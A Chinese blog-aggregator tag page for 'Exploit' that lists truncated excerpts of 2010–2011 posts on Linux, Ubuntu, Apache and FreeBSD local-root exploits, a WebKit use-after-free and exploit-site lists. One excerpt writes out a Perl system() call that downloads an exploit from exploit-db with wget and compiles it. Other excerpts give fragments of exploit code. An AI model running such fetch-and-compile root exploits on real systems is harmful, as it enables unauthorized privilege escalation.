E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
Exploit
Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure
Exploit
- /* *sigaltstack-leak.c * *LinuxKernel *http://jon.oberheide.org * *Information: * * http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856 * * UlrichDreppercorrectlypointsoutthatt
houwenhui
·
2011-05-18 15:30
linux
职场
休闲
exploit
Linux Kernel < 2.6.14.6 procfs Kernel Memory Disclosure
Exploit
/* *cve-2005-4605.c * *LinuxKernel *http://jon.oberheide.org * *Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4605 * * Theprocfscode(proc_misc.c)inLinux2.6.14.3andothervers
houwenhui
·
2011-05-18 15:13
linux
职场
休闲
exploit
Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root
Exploit
/* ::KristianHermansen:: Date:20070229 Description:LocalattackercaninfluenceApachetodirectcommands intoanopenttyownedbyuserwhostartedapacheprocess,usuallyroot. Thisresultsinarbitrarycommandexecution
houwenhui
·
2011-05-18 15:30
linux
职场
ubuntu
休闲
exploit
Ubuntu PAM MOTD File Tampering (Privilege Escalation)
/bin/sh##
Exploit
Title:UbuntuPAMMOTDfiletampering(privilegeescalation)#Date:July7,2010#Author:KristianErikHermansen
houwenhui
·
2011-05-18 14:58
linux
职场
ubuntu
休闲
exploit
Ubuntu PAM MOTD Local Root
Exploit
/bin/bash##
Exploit
Title:UbuntuPAMMOTDlocalroot#Date:July9,2010#Author:Anonymous#SoftwareLink:http://packages.ubuntu.com
houwenhui
·
2011-05-18 14:02
linux
职场
ubuntu
休闲
exploit
Linux Kernel 2.6.32 Local Root
Exploit
(x86_64)
#define_GNU_SOURCE#include#include#include#include#defineKSYM_NAME_LEN127structsym_entry{unsignedlonglongaddr;unsignedintlen;unsignedchar*sym;};staticstructsym_entry*table;staticunsignedinttable_size,
houwenhui
·
2011-05-18 14:43
linux
职场
kernel
休闲
exploit
linux非交互环境下本地提权思路与反思 linux localroot
exploit
在这一场景下,可以考虑参考下文的非交互式本地提权的方法,或许还有其他linuxlocalroot
exploit
也能实现,实战出真知。另外有些时候不一定
houwenhui
·
2011-05-18 14:49
linux
职场
休闲
exploit
Linux Kernel 2.4.x / 2.6.x uselib() Local Privilege Escalation
Exploit
/* *pwned.c-linux2.4and2.6sys_useliblocalroot
exploit
.PRIVATE.
houwenhui
·
2011-05-18 14:37
linux
职场
休闲
exploit
Exploit
Sites (
Exploit
发布站点收集帖)
http://packetstormsecurity.nl/http://hack.com.ru/http://www.hackcoza.tk/http://www.web-hack.ru/http://www.securiteam.com/http://www.security.nnov.ru/http://www.hackerzhell.co.uk/indexmain.phphttp://ha
yatere
·
2011-05-14 03:00
cygwin编译linux C程序
常见溢出网址:-Google.com -Securiteam.com -K-otik.com -Astalavista.box.sk -Coromputer.net -Securityfocus.com (搜索
exploit
yatere
·
2011-05-14 03:00
c
linux
cmd
Shellcodes是如何工作的
译者注:现在对
exploit
翻译的文章已经很多了,本文为作者锻炼翻译能力的作品,因此对于其学习价值请不要太多计较,因为我也不知道什么样的文章才受欢迎,呵呵。
yatere
·
2011-05-14 03:00
工作
linux
shell
汇编
null
语言
S-ON非白卡机福音Incredible S 临时取得root权限方法
Psneuter
exploit
isworkingonIS,butbecause/systemislockedons-onphones,wecan'tcopysuandsuperuser.apkinto/
cai75951577
·
2011-05-13 21:00
C++
c
C#
Access
渗透测试人员汇编资源[墙外]
BelowaretheusefulresourcestolearnAssembleyLanguageforpentesterstostartlearning
Exploit
writinghttp://www.skullsecurity.org
hackfreer
·
2011-05-13 12:14
ASM
职场
休闲
测试人员
用python写
exploit
测试软件漏洞时,个人比较钟爱用python来完成
exploit
,简单,快速。也见过不少用perl来写的,我不喜欢。随便记录一些常用的方法。
hackfreer
·
2011-05-09 17:35
python
职场
exp
休闲
exploit
用python写
exploit
测试软件漏洞时,个人比较钟爱用python来完成
exploit
,简单,快速。也见过不少用perl来写的,我不喜欢。随便记录一些常用的方法。
hackfreer
·
2011-05-09 17:35
职场
休闲
Exp
关于蟒蛇[Python]
linux本地自动溢出获取root权限工具
/getroot.pl{system("wget-O15704http://www.
exploit
-db.com/download/15704");system("gcc-w15704.c-o15704
houwenhui
·
2011-05-04 13:59
漏洞
linux
溢出
root权限
提权
phpGraphy 0.9.13b XSS
在
exploit
-db.com上看到,小看了下VulnerabilityID:HTB22958Reference:http://www.htbridge.ch/advisory/xss_in_phpgraphy.htmlProduct
upfont
·
2011-05-01 15:00
职场
XSS
休闲
phpGraphy 0.9.13b XSS
在
exploit
-db.com上看到,小看了下VulnerabilityID:HTB22958Reference:http://www.htbridge.ch/advisory/xss_in_phpgraphy.htmlProduct
upfont
·
2011-05-01 15:00
职场
xss
cross
休闲
phpGraphy
0.9.13b
wireless crack
更新版的驱动(可以处于监听模式) + 抓包软件(Omnipeek) + WEP破解软件(winaircrack、aircrack-ng for win等) http://blog.csdn.net/fre
exploit
wlcxx98
·
2011-04-27 09:00
.net
windows
Blog
WebKit Use-After-Free
Exploit
受影响版本:2.0 ,2.1, 2.1.1
functionheap(){varid=document.getElementById(“target”);varattribute=id.getAttributeNode(‘id’);nodes=attribute.childNodes;document.body.removeChild(id);attribute.removeChild(nodes[0]);setTimeout(functi
enables
·
2011-04-25 23:04
android
移动开发
系统
手机
0day
IRC
Xubuntu(GTK+)Kubuntu(Qt)ConsolebasedOtheroperatingsystemsChannelsBotsLogBotsubottuRegistrationOperatorsDCC
exploit
xiaojianpitt
·
2011-04-24 21:00
list
ubuntu
command
NetWork
logging
gtk
.* Local root
Exploit
/* freebsd mbufs() sendfile cache poisoning-priv escalation x86/x64 local root xpl v2 by Kingcope 2010 -- tested on: 8.1-RC1, 8.0-RELEASE, 7.3-RELEASE and 7.2-RELEASE-p
hackfreer
·
2011-04-21 19:24
职场
FreeBSD
休闲
Analysis of LizaMoon: Stored XSS via SQL Injection
BlendedAttacksMoreandmoreoftoday'swebapplicationattacksareleveragingmultipleweaknesses,vulnerabilitiesandattackmethodsinordertoachieveadesired
exploit
ationoutcome.Itisbecomingmoreandmoredifficulttonea
hackfreer
·
2011-04-13 12:44
sql
数据库
职场
休闲
LizaMoon
Analysis of LizaMoon: Stored XSS via SQL Injection
BlendedAttacksMoreandmoreoftoday'swebapplicationattacksareleveragingmultipleweaknesses,vulnerabilitiesandattackmethodsinordertoachieveadesired
exploit
ationoutcome.Itisbecomingmoreandmoredifficulttoneat
hackfreer
·
2011-04-13 12:44
职场
sql
数据库
***那点儿事
Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root
exploit
linux又爆一本地提权的漏洞,据之前的本地提权的漏洞时间很短啊···昨天还和朋友说起过,到底是windows安全还是linux安全?你说windows不安全,Microsoft用到现在也没啥大的问题,你说Linux安全,但又经常被一下子就到root了··所以说没有不安全的系统,只有不安全的人,最重要的还是用这操作系统的人,人才是安全的根本….附一个来自包子Blog的利用截图另附EXP:
hackfreer
·
2011-04-08 21:20
linux
职场
休闲
Linux RDS Protocol Local Privilege Escalation
http://www.vsecurity.com/download/tools/linux-rds-
exploit
.c /* * Linux Kernel * *
hackfreer
·
2011-04-08 21:42
linux
职场
休闲
普通用户tmp目录下越root权限
以一个普通用户登录系统:用户:joker内核:#id$ls-ld/tmp/ #查看tmp目录权限1777$cd/tmp/ #进入tmp目录[tmp]$mkdir
exploit
#建立一个
YgadYhtpi
·
2011-04-06 22:31
权限
休闲
普通用户
root权限
tmp目录
SQL注入攻击例子及Statement和PreparedStatement的比较
SQL injection is a technique that
exploit
s a security vulnerability occurring in the database layer of
yizefeng
·
2011-03-31 16:00
oracle
sql
jdbc
网络应用
企业应用
对FCKEditor <= 2.6.4 通杀
exploit
的分析
Author:handtsite :upload/2011/3/201103240211173836.jpg”border=”0″small=”0″alt=”"/>0×01
exploit
使用演示在
hackfreer
·
2011-03-27 21:47
fckeditor
职场
休闲
对 FCKEditor <= 2.6.4 通杀
exploit
的分析
http://www.wooyun.org/bugs/wooyun-2010-01684http://hi.baidu.com/handt03/blog/item/a5269ced77e42d3260d09f6c.html
obnus
·
2011-03-22 23:49
漏洞
fckeditor
编辑器
webshell
exploit
PHP本地文件包含漏洞的新突破
www.exp.com/index.php这样的GET请求,将一句话木马写入web日志,然后利用文件包含漏洞包含日志得到WEBSHELL,如milw0rm上的这个EXP:http://www.milw0rm.com/
exploit
s
obnus
·
2011-03-20 10:30
漏洞
PHP
职场
休闲
本地文件包含
oracle startup时 ORA-00600错误解决
From:http://oracle.chinaitlab.com/
exploit
ure/721518.html oracle9startup时报错ORA-00600:内部错误代码,参数:[kcratr1
nomad2
·
2011-03-12 13:00
oracle
sql
c
数据库
database
System
Java开发中容易产生Sql注入的原因以及避免方式
SQLinjection isatechniquethat
exploit
sa securityvulnerability occurringinthe database layerofan application
wanqiufeng
·
2011-03-09 10:07
java
sql
数据库
预编译
预处理
制作可保存配置的U盘版BT4(BackTrack4 )
一、安装1、准备:1).最小的USB驱动器的容量4GB的USB,格式为FAT32的;2).BT4正式版:下载地址:http://www.remote-
exploit
.org/backtrack_download.html3
ghoulvspol
·
2011-03-07 09:00
Top 13 SQL Scaners
SQLIer-SQLIertakesavulnerableURLandattemptstodetermineallthenecessaryinformationto
exploit
theSQLInjectionvulnerabilitybyitself
hackfreer
·
2011-02-27 17:50
sql
数据库
注入
休闲
SQLIer
提权
$mkdir/tmp/
exploit
#Linktoansuidbinary,thuschangingthedefinitionof$ORIGIN.
715434211
·
2011-02-22 13:27
职场
休闲
提权
struts2的安全漏洞及解决办法
转自:http://www.iteye.com/topic/720209
exploit
-db网站在7月14日爆出了一个Struts2的远程执行任意代码的漏洞。
merrymode
·
2011-02-21 10:00
java
apache
框架
struts
Webwork
ActiveX控件的保护技术之淘宝旺旺溢出分析
本文仅从反漏洞
exploit
、反调试和反逆向三个方面来阐述如何保护ActiveX控件的安全。
winsunxu
·
2011-02-20 15:00
JavaScript
html
function
脚本
dll
阿里巴巴
Oracle 10/11g exp.exe Buffer Overflow
/usr/bin/python # Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC
Exploit
# Date found approx
hackfreer
·
2011-02-19 20:54
Oracle
职场
数据库
***那点儿事
Oracle 10/11g exp.exe Buffer Overflow
/usr/bin/python # Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC
Exploit
# Date found
hackfreer
·
2011-02-19 20:54
oracle
数据库
职场
休闲
提权
$mkdir/tmp/
exploit
#Linktoansuidbinary,thuschangingthedefinitionof$ORIGIN.
colinzhouyj
·
2011-02-11 11:36
职场
休闲
无
提权
$mkdir/tmp/
exploit
#Linktoansuidbinary,thuschangingthedefinitionof$ORIGIN.
colinzhouyj
·
2011-02-11 11:36
职场
无
休闲
转载
Methods of quick
exploit
ation of blind SQL Injection Vulnerabilities in Oracle
Ihadgatheredaninteresting collectionofquickmethodsofblindSQLInjection
exploit
ation,butIwaslackinginasimilarmethodforanotherwidespreadDBMS
hackfreer
·
2011-01-17 12:34
oracle
sql
数据库
职场
休闲
Drive-By Download测试框架 - drivesploit
可实施Drive-ByDownload的综合性+工具相当多,大多都是傻瓜式的,如著名的Zeus,Phoenix等
exploit
套件,它们都具有较高的易用性和成功率,drivesploit
leeeryan
·
2011-01-12 09:00
JavaScript
框架
iframe
测试
工具
download
《0day安全:软件漏洞分析技术第二版》
可以说我们在这次再版中逐一讲述并总结了目前世界上windows平台下几乎所有最前沿的内存
exploit
技术。时效性是再版的重要原因。 然后,第一版
leeeryan
·
2011-01-11 09:00
windows
脚本
测试
sqlserver
测试工具
WindowsMobile
enlightenment提权的工具
/run_null_
exploit
s.sh./run_null_
exploit
s.sh
lovejuan007
·
2011-01-10 11:56
职场
休闲
exploits
cpuinfo
enlightenment
基于栈溢出的
EXPLOIT
编写
声明:以下涉及的内容只作为学习的目的,任何因为滥用本篇内容而导致对个人或者企业组织造成危害,作者并不承担任何责任。◆目标软件EasyRMtoMP3Converter(版本2.7.3.700)◆辅助工具WinDbg6.12、Metasploit3.4.1、ActivePerl5.12◆漏洞描述通过创建一个恶意的.m3u文件将触发EasyRMtoMP3Converter(version2.7.3.70
yuzl32
·
2011-01-10 04:00
c
windows
File
测试
perl
dll
Linux2.6内核本地提权
提权步骤: $ mkdir /tmp/
exploit
# Link to an suid binary, thus changing the definition of $ORIGIN
王文华
·
2011-01-04 14:32
linux
职场
休闲
Linux提权
基于GNU glibc动态连接 提权
编写这样一个脚本, mkdir /tmp/
exploit
ln /bin/ping /tmp/
exploit
/target exec 3> /tmp/payload.c <
charlie_long
·
2011-01-04 11:42
职场
休闲
glibc
系统安全
提权
BackTrack 官网被黑 更新中
BackTrack、
exploit
db等网站被黑事件最新消息 首先给大家报个好消息 Ettercap工程源码并没有被植入后门下面是Ettercap主要开发人员AlbertoOrnaghi(ALoR
ilovecto
·
2010-12-29 11:10
职场
休闲
Backtrack
上一页
42
43
44
45
46
47
48
49
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他